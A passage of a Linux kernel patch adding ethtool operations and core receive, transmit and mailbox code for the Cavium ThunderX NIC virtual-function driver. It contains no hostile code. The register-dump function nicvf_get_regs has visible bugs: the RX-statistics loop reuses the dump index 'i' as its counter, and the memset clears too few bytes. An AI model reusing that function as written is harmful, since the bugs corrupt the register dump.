MAX_SND_QUEUES_PER_QS)) + + BGX_RX_STATS_COUNT + BGX_TX_STATS_COUNT; +} + +static void nicvf_get_ethtool_stats(struct net_device *netdev, + struct ethtool_stats *stats, u64 *data) +{ + struct nicvf *nic = netdev_priv(netdev); + int stat, qidx; + + nicvf_update_stats(nic); + + /* Update LMAC stats */ + nicvf_update_lmac_stats(nic); + + for (stat = 0; stat < nicvf_n_hw_stats; stat++) + *(data++) = ((u64 *)&nic->stats) + [nicvf_hw_stats[stat].index]; + for (stat = 0; stat < nicvf_n_drv_stats; stat++) + *(data++) = ((u64 *)&nic->drv_stats) + [nicvf_drv_stats[stat].index]; + + for (qidx = 0; qidx < MAX_RCV_QUEUES_PER_QS; qidx++) { + for (stat = 0; stat < nicvf_n_queue_stats; stat++) + *(data++) = ((u64 *)&nic->qs->rq[qidx].stats) + [nicvf_queue_stats[stat].index]; + } + + for (qidx = 0; qidx < MAX_SND_QUEUES_PER_QS; qidx++) { + for (stat = 0; stat < nicvf_n_queue_stats; stat++) + *(data++) = ((u64 *)&nic->qs->sq[qidx].stats) + [nicvf_queue_stats[stat].index]; + } + + for (stat = 0; stat < BGX_RX_STATS_COUNT; stat++) + *(data++) = nic->bgx_stats.rx_stats[stat]; + for (stat = 0; stat < BGX_TX_STATS_COUNT; stat++) + *(data++) = nic->bgx_stats.tx_stats[stat]; +} + +static int nicvf_get_regs_len(struct net_device *dev) +{ + return sizeof(u64) * NIC_VF_REG_COUNT; +} + +static void nicvf_get_regs(struct net_device *dev, + struct ethtool_regs *regs, void *reg) +{ + struct nicvf *nic = netdev_priv(dev); + u64 *p = (u64 *)reg; + u64 reg_offset; + int mbox, key, stat, q; + int i = 0; + + regs->version = 0; + memset(p, 0, NIC_VF_REG_COUNT); + + p[i++] = nicvf_reg_read(nic, NIC_VNIC_CFG); + /* Mailbox registers */ + for (mbox = 0; mbox < NIC_PF_VF_MAILBOX_SIZE; mbox++) + p[i++] = nicvf_reg_read(nic, + NIC_VF_PF_MAILBOX_0_1 | (mbox << 3)); + + p[i++] = nicvf_reg_read(nic, NIC_VF_INT); + p[i++] = nicvf_reg_read(nic, NIC_VF_INT_W1S); + p[i++] = nicvf_reg_read(nic, NIC_VF_ENA_W1C); + p[i++] = nicvf_reg_read(nic, NIC_VF_ENA_W1S); + p[i++] = nicvf_reg_read(nic, NIC_VNIC_RSS_CFG); + + for (key = 0; key < RSS_HASH_KEY_SIZE; key++) + p[i++] = nicvf_reg_read(nic, NIC_VNIC_RSS_KEY_0_4 | (key << 3)); + + /* Tx/Rx statistics */ + for (stat = 0; stat < TX_STATS_ENUM_LAST; stat++) + p[i++] = nicvf_reg_read(nic, + NIC_VNIC_TX_STAT_0_4 | (stat << 3)); + + for (i = 0; i < RX_STATS_ENUM_LAST; i++) + p[i++] = nicvf_reg_read(nic, + NIC_VNIC_RX_STAT_0_13 | (stat << 3)); + + p[i++] = nicvf_reg_read(nic, NIC_QSET_RQ_GEN_CFG); + + /* All completion queue's registers */ + for (q = 0; q < MAX_CMP_QUEUES_PER_QS; q++) { + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_CFG, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_CFG2, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_THRESH, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_BASE, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_HEAD, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_TAIL, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_DOOR, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_STATUS, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_STATUS2, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_DEBUG, q); + } + + /* All receive queue's registers */ + for (q = 0; q < MAX_RCV_QUEUES_PER_QS; q++) { + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RQ_0_7_CFG, q); + p[i++] = nicvf_queue_reg_read(nic, + NIC_QSET_RQ_0_7_STAT_0_1, q); + reg_offset = NIC_QSET_RQ_0_7_STAT_0_1 | (1 << 3); + p[i++] = nicvf_queue_reg_read(nic, reg_offset, q); + } + + for (q = 0; q < MAX_SND_QUEUES_PER_QS; q++) { + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_CFG, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_THRESH, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_BASE, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_HEAD, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_TAIL, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_DOOR, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_STATUS, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_DEBUG, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_CNM_CHG, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_STAT_0_1, q); + reg_offset = NIC_QSET_SQ_0_7_STAT_0_1 | (1 << 3); + p[i++] = nicvf_queue_reg_read(nic, reg_offset, q); + } + + for (q = 0; q < MAX_RCV_BUF_DESC_RINGS_PER_QS; q++) { + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_CFG, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_THRESH, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_BASE, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_HEAD, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_TAIL, q); + p[i++] = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_DOOR, q); + p[i++] = nicvf_queue_reg_read(nic, + NIC_QSET_RBDR_0_1_STATUS0, q); + p[i++] = nicvf_queue_reg_read(nic, + NIC_QSET_RBDR_0_1_STATUS1, q); + reg_offset = NIC_QSET_RBDR_0_1_PREFETCH_STATUS; + p[i++] = nicvf_queue_reg_read(nic, reg_offset, q); + } +} + +static int nicvf_get_coalesce(struct net_device *netdev, + struct ethtool_coalesce *cmd) +{ + struct nicvf *nic = netdev_priv(netdev); + + cmd->rx_coalesce_usecs = nic->cq_coalesce_usecs; + return 0; +} + +static void nicvf_get_ringparam(struct net_device *netdev, + struct ethtool_ringparam *ring) +{ + struct nicvf *nic = netdev_priv(netdev); + struct queue_set *qs = nic->qs; + + ring->rx_max_pending = MAX_RCV_BUF_COUNT; + ring->rx_pending = qs->rbdr_len; + ring->tx_max_pending = MAX_SND_QUEUE_LEN; + ring->tx_pending = qs->sq_len; +} + +static int nicvf_get_rss_hash_opts(struct nicvf *nic, + struct ethtool_rxnfc *info) +{ + info->data = 0; + + switch (info->flow_type) { + case TCP_V4_FLOW: + case TCP_V6_FLOW: + case UDP_V4_FLOW: + case UDP_V6_FLOW: + case SCTP_V4_FLOW: + case SCTP_V6_FLOW: + info->data |= RXH_L4_B_0_1 | RXH_L4_B_2_3; + case IPV4_FLOW: + case IPV6_FLOW: + info->data |= RXH_IP_SRC | RXH_IP_DST; + break; + default: + return -EINVAL; + } + + return 0; +} + +static int nicvf_get_rxnfc(struct net_device *dev, + struct ethtool_rxnfc *info, u32 *rules) +{ + struct nicvf *nic = netdev_priv(dev); + int ret = -EOPNOTSUPP; + + switch (info->cmd) { + case ETHTOOL_GRXRINGS: + info->data = nic->qs->rq_cnt; + ret = 0; + break; + case ETHTOOL_GRXFH: + return nicvf_get_rss_hash_opts(nic, info); + default: + break; + } + return ret; +} + +static int nicvf_set_rss_hash_opts(struct nicvf *nic, + struct ethtool_rxnfc *info) +{ + struct nicvf_rss_info *rss = &nic->rss_info; + u64 rss_cfg = nicvf_reg_read(nic, NIC_VNIC_RSS_CFG); + + if (!rss->enable) + netdev_err(nic->netdev, + "RSS is disabled, hash cannot be set\n"); + + netdev_info(nic->netdev, "Set RSS flow type = %d, data = %lld\n", + info->flow_type, info->data); + + if (!(info->data & RXH_IP_SRC) || !(info->data & RXH_IP_DST)) + return -EINVAL; + + switch (info->flow_type) { + case TCP_V4_FLOW: + case TCP_V6_FLOW: + switch (info->data & (RXH_L4_B_0_1 | RXH_L4_B_2_3)) { + case 0: + rss_cfg &= ~(1ULL << RSS_HASH_TCP); + break; + case (RXH_L4_B_0_1 | RXH_L4_B_2_3): + rss_cfg |= (1ULL << RSS_HASH_TCP); + break; + default: + return -EINVAL; + } + break; + case UDP_V4_FLOW: + case UDP_V6_FLOW: + switch (info->data & (RXH_L4_B_0_1 | RXH_L4_B_2_3)) { + case 0: + rss_cfg &= ~(1ULL << RSS_HASH_UDP); + break; + case (RXH_L4_B_0_1 | RXH_L4_B_2_3): + rss_cfg |= (1ULL << RSS_HASH_UDP); + break; + default: + return -EINVAL; + } + break; + case SCTP_V4_FLOW: + case SCTP_V6_FLOW: + switch (info->data & (RXH_L4_B_0_1 | RXH_L4_B_2_3)) { + case 0: + rss_cfg &= ~(1ULL << RSS_HASH_L4ETC); + break; + case (RXH_L4_B_0_1 | RXH_L4_B_2_3): + rss_cfg |= (1ULL << RSS_HASH_L4ETC); + break; + default: + return -EINVAL; + } + break; + case IPV4_FLOW: + case IPV6_FLOW: + rss_cfg = RSS_HASH_IP; + break; + default: + return -EINVAL; + } + + nicvf_reg_write(nic, NIC_VNIC_RSS_CFG, rss_cfg); + return 0; +} + +static int nicvf_set_rxnfc(struct net_device *dev, struct ethtool_rxnfc *info) +{ + struct nicvf *nic = netdev_priv(dev); + + switch (info->cmd) { + case ETHTOOL_SRXFH: + return nicvf_set_rss_hash_opts(nic, info); + default: + break; + } + return -EOPNOTSUPP; +} + +static u32 nicvf_get_rxfh_key_size(struct net_device *netdev) +{ + return RSS_HASH_KEY_SIZE * sizeof(u64); +} + +static u32 nicvf_get_rxfh_indir_size(struct net_device *dev) +{ + struct nicvf *nic = netdev_priv(dev); + + return nic->rss_info.rss_size; +} + +static int nicvf_get_rxfh(struct net_device *dev, u32 *indir, u8 *hkey, + u8 *hfunc) +{ + struct nicvf *nic = netdev_priv(dev); + struct nicvf_rss_info *rss = &nic->rss_info; + int idx; + + if (indir) { + for (idx = 0; idx < rss->rss_size; idx++) + indir[idx] = rss->ind_tbl[idx]; + } + + if (hkey) + memcpy(hkey, rss->key, RSS_HASH_KEY_SIZE * sizeof(u64)); + + if (hfunc) + *hfunc = ETH_RSS_HASH_TOP; + + return 0; +} + +static int nicvf_set_rxfh(struct net_device *dev, const u32 *indir, + const u8 *hkey, u8 hfunc) +{ + struct nicvf *nic = netdev_priv(dev); + struct nicvf_rss_info *rss = &nic->rss_info; + int idx; + + if ((nic->qs->rq_cnt <= 1) || (nic->cpi_alg != CPI_ALG_NONE)) { + rss->enable = false; + rss->hash_bits = 0; + return -EIO; + } + + /* We do not allow change in unsupported parameters */ + if (hkey || + (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)) + return -EOPNOTSUPP; + + rss->enable = true; + if (indir) { + for (idx = 0; idx < rss->rss_size; idx++) + rss->ind_tbl[idx] = indir[idx]; + } + + if (hkey) { + memcpy(rss->key, hkey, RSS_HASH_KEY_SIZE * sizeof(u64)); + nicvf_set_rss_key(nic); + } + + nicvf_config_rss(nic); + return 0; +} + +/* Get no of queues device supports and current queue count */ +static void nicvf_get_channels(struct net_device *dev, + struct ethtool_channels *channel) +{ + struct nicvf *nic = netdev_priv(dev); + + memset(channel, 0, sizeof(*channel)); + + channel->max_rx = MAX_RCV_QUEUES_PER_QS; + channel->max_tx = MAX_SND_QUEUES_PER_QS; + + channel->rx_count = nic->qs->rq_cnt; + channel->tx_count = nic->qs->sq_cnt; +} + +/* Set no of Tx, Rx queues to be used */ +static int nicvf_set_channels(struct net_device *dev, + struct ethtool_channels *channel) +{ + struct nicvf *nic = netdev_priv(dev); + int err = 0; + + if (!channel->rx_count || !channel->tx_count) + return -EINVAL; + if (channel->rx_count > MAX_RCV_QUEUES_PER_QS) + return -EINVAL; + if (channel->tx_count > MAX_SND_QUEUES_PER_QS) + return -EINVAL; + + nic->qs->rq_cnt = channel->rx_count; + nic->qs->sq_cnt = channel->tx_count; + nic->qs->cq_cnt = max(nic->qs->rq_cnt, nic->qs->sq_cnt); + + err = nicvf_set_real_num_queues(dev, nic->qs->sq_cnt, nic->qs->rq_cnt); + if (err) + return err; + + if (!netif_running(dev)) + return err; + + nicvf_stop(dev); + nicvf_open(dev); + netdev_info(dev, "Setting num Tx rings to %d, Rx rings to %d success\n", + nic->qs->sq_cnt, nic->qs->rq_cnt); + + return err; +} + +static const struct ethtool_ops nicvf_ethtool_ops = { + .get_settings = nicvf_get_settings, + .get_link = ethtool_op_get_link, + .get_drvinfo = nicvf_get_drvinfo, + .get_msglevel = nicvf_get_msglevel, + .set_msglevel = nicvf_set_msglevel, + .get_strings = nicvf_get_strings, + .get_sset_count = nicvf_get_sset_count, + .get_ethtool_stats = nicvf_get_ethtool_stats, + .get_regs_len = nicvf_get_regs_len, + .get_regs = nicvf_get_regs, + .get_coalesce = nicvf_get_coalesce, + .get_ringparam = nicvf_get_ringparam, + .get_rxnfc = nicvf_get_rxnfc, + .set_rxnfc = nicvf_set_rxnfc, + .get_rxfh_key_size = nicvf_get_rxfh_key_size, + .get_rxfh_indir_size = nicvf_get_rxfh_indir_size, + .get_rxfh = nicvf_get_rxfh, + .set_rxfh = nicvf_set_rxfh, + .get_channels = nicvf_get_channels, + .set_channels = nicvf_set_channels, + .get_ts_info = ethtool_op_get_ts_info, +}; + +void nicvf_set_ethtool_ops(struct net_device *netdev) +{ + netdev->ethtool_ops = &nicvf_ethtool_ops; +} diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_main.c b/drivers/net/ethernet/cavium/thunder/nicvf_main.c new file mode 100644 index 000000000000..abd446e6155b --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nicvf_main.c @@ -0,0 +1,1332 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "nic_reg.h" +#include "nic.h" +#include "nicvf_queues.h" +#include "thunder_bgx.h" + +#define DRV_NAME "thunder-nicvf" +#define DRV_VERSION "1.0" + +/* Supported devices */ +static const struct pci_device_id nicvf_id_table[] = { + { PCI_DEVICE_SUB(PCI_VENDOR_ID_CAVIUM, + PCI_DEVICE_ID_THUNDER_NIC_VF, + PCI_VENDOR_ID_CAVIUM, 0xA11E) }, + { PCI_DEVICE_SUB(PCI_VENDOR_ID_CAVIUM, + PCI_DEVICE_ID_THUNDER_PASS1_NIC_VF, + PCI_VENDOR_ID_CAVIUM, 0xA11E) }, + { 0, } /* end of table */ +}; + +MODULE_AUTHOR("Sunil Goutham"); +MODULE_DESCRIPTION("Cavium Thunder NIC Virtual Function Driver"); +MODULE_LICENSE("GPL v2"); +MODULE_VERSION(DRV_VERSION); +MODULE_DEVICE_TABLE(pci, nicvf_id_table); + +static int debug = 0x00; +module_param(debug, int, 0644); +MODULE_PARM_DESC(debug, "Debug message level bitmap"); + +static int cpi_alg = CPI_ALG_NONE; +module_param(cpi_alg, int, S_IRUGO); +MODULE_PARM_DESC(cpi_alg, + "PFC algorithm (0=none, 1=VLAN, 2=VLAN16, 3=IP Diffserv)"); + +static int nicvf_enable_msix(struct nicvf *nic); +static netdev_tx_t nicvf_xmit(struct sk_buff *skb, struct net_device *netdev); +static void nicvf_read_bgx_stats(struct nicvf *nic, struct bgx_stats_msg *bgx); + +static inline void nicvf_set_rx_frame_cnt(struct nicvf *nic, + struct sk_buff *skb) +{ + if (skb->len <= 64) + nic->drv_stats.rx_frames_64++; + else if (skb->len <= 127) + nic->drv_stats.rx_frames_127++; + else if (skb->len <= 255) + nic->drv_stats.rx_frames_255++; + else if (skb->len <= 511) + nic->drv_stats.rx_frames_511++; + else if (skb->len <= 1023) + nic->drv_stats.rx_frames_1023++; + else if (skb->len <= 1518) + nic->drv_stats.rx_frames_1518++; + else + nic->drv_stats.rx_frames_jumbo++; +} + +/* The Cavium ThunderX network controller can *only* be found in SoCs + * containing the ThunderX ARM64 CPU implementation. All accesses to the device + * registers on this platform are implicitly strongly ordered with respect + * to memory accesses. So writeq_relaxed() and readq_relaxed() are safe to use + * with no memory barriers in this driver. The readq()/writeq() functions add + * explicit ordering operation which in this case are redundant, and only + * add overhead. + */ + +/* Register read/write APIs */ +void nicvf_reg_write(struct nicvf *nic, u64 offset, u64 val) +{ + writeq_relaxed(val, nic->reg_base + offset); +} + +u64 nicvf_reg_read(struct nicvf *nic, u64 offset) +{ + return readq_relaxed(nic->reg_base + offset); +} + +void nicvf_queue_reg_write(struct nicvf *nic, u64 offset, + u64 qidx, u64 val) +{ + void __iomem *addr = nic->reg_base + offset; + + writeq_relaxed(val, addr + (qidx << NIC_Q_NUM_SHIFT)); +} + +u64 nicvf_queue_reg_read(struct nicvf *nic, u64 offset, u64 qidx) +{ + void __iomem *addr = nic->reg_base + offset; + + return readq_relaxed(addr + (qidx << NIC_Q_NUM_SHIFT)); +} + +/* VF -> PF mailbox communication */ + +int nicvf_send_msg_to_pf(struct nicvf *nic, union nic_mbx *mbx) +{ + int timeout = NIC_MBOX_MSG_TIMEOUT; + int sleep = 10; + u64 *msg = (u64 *)mbx; + + nic->pf_acked = false; + nic->pf_nacked = false; + + nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 0, msg[0]); + nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 8, msg[1]); + + /* Wait for previous message to be acked, timeout 2sec */ + while (!nic->pf_acked) { + if (nic->pf_nacked) + return -EINVAL; + msleep(sleep); + if (nic->pf_acked) + break; + timeout -= sleep; + if (!timeout) { + netdev_err(nic->netdev, + "PF didn't ack to mbox msg %d from VF%d\n", + (mbx->msg.msg & 0xFF), nic->vf_id); + return -EBUSY; + } + } + return 0; +} + +/* Checks if VF is able to comminicate with PF +* and also gets the VNIC number this VF is associated to. +*/ +static int nicvf_check_pf_ready(struct nicvf *nic) +{ + int timeout = 5000, sleep = 20; + + nic->pf_ready_to_rcv_msg = false; + + nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 0, + le64_to_cpu(NIC_MBOX_MSG_READY)); + nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 8, 1ULL); + + while (!nic->pf_ready_to_rcv_msg) { + msleep(sleep); + if (nic->pf_ready_to_rcv_msg) + break; + timeout -= sleep; + if (!timeout) { + netdev_err(nic->netdev, + "PF didn't respond to READY msg\n"); + return 0; + } + } + return 1; +} + +static void nicvf_handle_mbx_intr(struct nicvf *nic) +{ + union nic_mbx mbx = {}; + u64 *mbx_data; + u64 mbx_addr; + int i; + + mbx_addr = NIC_VF_PF_MAILBOX_0_1; + mbx_data = (u64 *)&mbx; + + for (i = 0; i < NIC_PF_VF_MAILBOX_SIZE; i++) { + *mbx_data = nicvf_reg_read(nic, mbx_addr); + mbx_data++; + mbx_addr += sizeof(u64); + } + + netdev_dbg(nic->netdev, "Mbox message: msg: 0x%x\n", mbx.msg.msg); + switch (mbx.msg.msg) { + case NIC_MBOX_MSG_READY: + nic->pf_ready_to_rcv_msg = true; + nic->vf_id = mbx.nic_cfg.vf_id & 0x7F; + nic->tns_mode = mbx.nic_cfg.tns_mode & 0x7F; + nic->node = mbx.nic_cfg.node_id; + ether_addr_copy(nic->netdev->dev_addr, + (u8 *)&mbx.nic_cfg.mac_addr); + nic->link_up = false; + nic->duplex = 0; + nic->speed = 0; + break; + case NIC_MBOX_MSG_ACK: + nic->pf_acked = true; + break; + case NIC_MBOX_MSG_NACK: + nic->pf_nacked = true; + break; + case NIC_MBOX_MSG_RSS_SIZE: + nic->rss_info.rss_size = mbx.rss_size.ind_tbl_size; + nic->pf_acked = true; + break; + case NIC_MBOX_MSG_BGX_STATS: + nicvf_read_bgx_stats(nic, &mbx.bgx_stats); + nic->pf_acked = true; + nic->bgx_stats_acked = true; + break; + case NIC_MBOX_MSG_BGX_LINK_CHANGE: + nic->pf_acked = true; + nic->link_up = mbx.link_status.link_up; + nic->duplex = mbx.link_status.duplex; + nic->speed = mbx.link_status.speed; + if (nic->link_up) { + netdev_info(nic->netdev, "%s: Link is Up %d Mbps %s\n", + nic->netdev->name, nic->speed, + nic->duplex == DUPLEX_FULL ? + "Full duplex" : "Half duplex"); + netif_carrier_on(nic->netdev); + netif_tx_wake_all_queues(nic->netdev); + } else { + netdev_info(nic->netdev, "%s: Link is Down\n", + nic->netdev->name); + netif_carrier_off(nic->netdev); + netif_tx_stop_all_queues(nic->netdev); + } + break; + default: + netdev_err(nic->netdev, + "Invalid message from PF, msg 0x%x\n", mbx.msg.msg); + break; + } + nicvf_clear_intr(nic, NICVF_INTR_MBOX, 0); +} + +static int nicvf_hw_set_mac_addr(struct nicvf *nic, struct net_device *netdev) +{ + union nic_mbx mbx = {}; + int i; + + mbx.mac.msg = NIC_MBOX_MSG_SET_MAC; + mbx.mac.vf_id = nic->vf_id; + for (i = 0; i < ETH_ALEN; i++) + mbx.mac.addr = (mbx.mac.addr << 8) | + netdev->dev_addr[i]; + + return nicvf_send_msg_to_pf(nic, &mbx); +} + +void nicvf_config_cpi(struct nicvf *nic) +{ + union nic_mbx mbx = {}; + + mbx.cpi_cfg.msg = NIC_MBOX_MSG_CPI_CFG; + mbx.cpi_cfg.vf_id = nic->vf_id; + mbx.cpi_cfg.cpi_alg = nic->cpi_alg; + mbx.cpi_cfg.rq_cnt = nic->qs->rq_cnt; + + nicvf_send_msg_to_pf(nic, &mbx); +} + +void nicvf_get_rss_size(struct nicvf *nic) +{ + union nic_mbx mbx = {}; + + mbx.rss_size.msg = NIC_MBOX_MSG_RSS_SIZE; + mbx.rss_size.vf_id = nic->vf_id; + nicvf_send_msg_to_pf(nic, &mbx); +} + +void nicvf_config_rss(struct nicvf *nic) +{ + union nic_mbx mbx = {}; + struct nicvf_rss_info *rss = &nic->rss_info; + int ind_tbl_len = rss->rss_size; + int i, nextq = 0; + + mbx.rss_cfg.vf_id = nic->vf_id; + mbx.rss_cfg.hash_bits = rss->hash_bits; + while (ind_tbl_len) { + mbx.rss_cfg.tbl_offset = nextq; + mbx.rss_cfg.tbl_len = min(ind_tbl_len, + RSS_IND_TBL_LEN_PER_MBX_MSG); + mbx.rss_cfg.msg = mbx.rss_cfg.tbl_offset ? + NIC_MBOX_MSG_RSS_CFG_CONT : NIC_MBOX_MSG_RSS_CFG; + + for (i = 0; i < mbx.rss_cfg.tbl_len; i++) + mbx.rss_cfg.ind_tbl[i] = rss->ind_tbl[nextq++]; + + nicvf_send_msg_to_pf(nic, &mbx); + + ind_tbl_len -= mbx.rss_cfg.tbl_len; + } +} + +void nicvf_set_rss_key(struct nicvf *nic) +{ + struct nicvf_rss_info *rss = &nic->rss_info; + u64 key_addr = NIC_VNIC_RSS_KEY_0_4; + int idx; + + for (idx = 0; idx < RSS_HASH_KEY_SIZE; idx++) { + nicvf_reg_write(nic, key_addr, rss->key[idx]); + key_addr += sizeof(u64); + } +} + +static int nicvf_rss_init(struct nicvf *nic) +{ + struct nicvf_rss_info *rss = &nic->rss_info; + int idx; + + nicvf_get_rss_size(nic); + + if ((nic->qs->rq_cnt <= 1) || (cpi_alg != CPI_ALG_NONE)) { + rss->enable = false; + rss->hash_bits = 0; + return 0; + } + + rss->enable = true; + + /* Using the HW reset value for now */ + rss->key[0] = 0xFEED0BADFEED0BAD; + rss->key[1] = 0xFEED0BADFEED0BAD; + rss->key[2] = 0xFEED0BADFEED0BAD; + rss->key[3] = 0xFEED0BADFEED0BAD; + rss->key[4] = 0xFEED0BADFEED0BAD; + + nicvf_set_rss_key(nic); + + rss->cfg = RSS_IP_HASH_ENA | RSS_TCP_HASH_ENA | RSS_UDP_HASH_ENA; + nicvf_reg_write(nic, NIC_VNIC_RSS_CFG, rss->cfg); + + rss->hash_bits = ilog2(rounddown_pow_of_two(rss->rss_size)); + + for (idx = 0; idx < rss->rss_size; idx++) + rss->ind_tbl[idx] = ethtool_rxfh_indir_default(idx, + nic->qs->rq_cnt); + nicvf_config_rss(nic); + return 1; +} + +int nicvf_set_real_num_queues(struct net_device *netdev, + int tx_queues, int rx_queues) +{ + int err = 0; + + err = netif_set_real_num_tx_queues(netdev, tx_queues); + if (err) { + netdev_err(netdev, + "Failed to set no of Tx queues: %d\n", tx_queues); + return err; + } + + err = netif_set_real_num_rx_queues(netdev, rx_queues); + if (err) + netdev_err(netdev, + "Failed to set no of Rx queues: %d\n", rx_queues); + return err; +} + +static int nicvf_init_resources(struct nicvf *nic) +{ + int err; + u64 mbx_addr = NIC_VF_PF_MAILBOX_0_1; + + /* Enable Qset */ + nicvf_qset_config(nic, true); + + /* Initialize queues and HW for data transfer */ + err = nicvf_config_data_transfer(nic, true); + if (err) { + netdev_err(nic->netdev, + "Failed to alloc/config VF's QSet resources\n"); + return err; + } + + /* Send VF config done msg to PF */ + nicvf_reg_write(nic, mbx_addr, le64_to_cpu(NIC_MBOX_MSG_CFG_DONE)); + mbx_addr += (NIC_PF_VF_MAILBOX_SIZE - 1) * 8; + nicvf_reg_write(nic, mbx_addr, 1ULL); + + return 0; +} + +static void nicvf_snd_pkt_handler(struct net_device *netdev, + struct cmp_queue *cq, + struct cqe_send_t *cqe_tx, int cqe_type) +{ + struct sk_buff *skb = NULL; + struct nicvf *nic = netdev_priv(netdev); + struct snd_queue *sq; + struct sq_hdr_subdesc *hdr; + + sq = &nic->qs->sq[cqe_tx->sq_idx]; + + hdr = (struct sq_hdr_subdesc *)GET_SQ_DESC(sq, cqe_tx->sqe_ptr); + if (hdr->subdesc_type != SQ_DESC_TYPE_HEADER) + return; + + netdev_dbg(nic->netdev, + "%s Qset #%d SQ #%d SQ ptr #%d subdesc count %d\n", + __func__, cqe_tx->sq_qs, cqe_tx->sq_idx, + cqe_tx->sqe_ptr, hdr->subdesc_cnt); + + nicvf_put_sq_desc(sq, hdr->subdesc_cnt + 1); + nicvf_check_cqe_tx_errs(nic, cq, cqe_tx); + skb = (struct sk_buff *)sq->skbuff[cqe_tx->sqe_ptr]; + /* For TSO offloaded packets only one head SKB needs to be freed */ + if (skb) { + prefetch(skb); + dev_consume_skb_any(skb); + } +} + +static void nicvf_rcv_pkt_handler(struct net_device *netdev, + struct napi_struct *napi, + struct cmp_queue *cq, + struct cqe_rx_t *cqe_rx, int cqe_type) +{ + struct sk_buff *skb; + struct nicvf *nic = netdev_priv(netdev); + int err = 0; + + /* Check for errors */ + err = nicvf_check_cqe_rx_errs(nic, cq, cqe_rx); + if (err && !cqe_rx->rb_cnt) + return; + + skb = nicvf_get_rcv_skb(nic, cqe_rx); + if (!skb) { + netdev_dbg(nic->netdev, "Packet not received\n"); + return; + } + + if (netif_msg_pktdata(nic)) { + netdev_info(nic->netdev, "%s: skb 0x%p, len=%d\n", netdev->name, + skb, skb->len); + print_hex_dump(KERN_INFO, "", DUMP_PREFIX_OFFSET, 16, 1, + skb->data, skb->len, true); + } + + nicvf_set_rx_frame_cnt(nic, skb); + + skb_record_rx_queue(skb, cqe_rx->rq_idx); + if (netdev->hw_features & NETIF_F_RXCSUM) { + /* HW by default verifies TCP/UDP/SCTP checksums */ + skb->ip_summed = CHECKSUM_UNNECESSARY; + } else { + skb_checksum_none_assert(skb); + } + + skb->protocol = eth_type_trans(skb, netdev); + + if (napi && (netdev->features & NETIF_F_GRO)) + napi_gro_receive(napi, skb); + else + netif_receive_skb(skb); +} + +static int nicvf_cq_intr_handler(struct net_device *netdev, u8 cq_idx, + struct napi_struct *napi, int budget) +{ + int processed_cqe, work_done = 0; + int cqe_count, cqe_head; + struct nicvf *nic = netdev_priv(netdev); + struct queue_set *qs = nic->qs; + struct cmp_queue *cq = &qs->cq[cq_idx]; + struct cqe_rx_t *cq_desc; + + spin_lock_bh(&cq->lock); +loop: + processed_cqe = 0; + /* Get no of valid CQ entries to process */ + cqe_count = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_STATUS, cq_idx); + cqe_count &= CQ_CQE_COUNT; + if (!cqe_count) + goto done; + + /* Get head of the valid CQ entries */ + cqe_head = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_HEAD, cq_idx) >> 9; + cqe_head &= 0xFFFF; + + netdev_dbg(nic->netdev, "%s cqe_count %d cqe_head %d\n", + __func__, cqe_count, cqe_head); + while (processed_cqe < cqe_count) { + /* Get the CQ descriptor */ + cq_desc = (struct cqe_rx_t *)GET_CQ_DESC(cq, cqe_head); + cqe_head++; + cqe_head &= (cq->dmem.q_len - 1); + /* Initiate prefetch for next descriptor */ + prefetch((struct cqe_rx_t *)GET_CQ_DESC(cq, cqe_head)); + + if ((work_done >= budget) && napi && + (cq_desc->cqe_type != CQE_TYPE_SEND)) { + break; + } + + netdev_dbg(nic->netdev, "cq_desc->cqe_type %d\n", + cq_desc->cqe_type); + switch (cq_desc->cqe_type) { + case CQE_TYPE_RX: + nicvf_rcv_pkt_handler(netdev, napi, cq, + cq_desc, CQE_TYPE_RX); + work_done++; + break; + case CQE_TYPE_SEND: + nicvf_snd_pkt_handler(netdev, cq, + (void *)cq_desc, 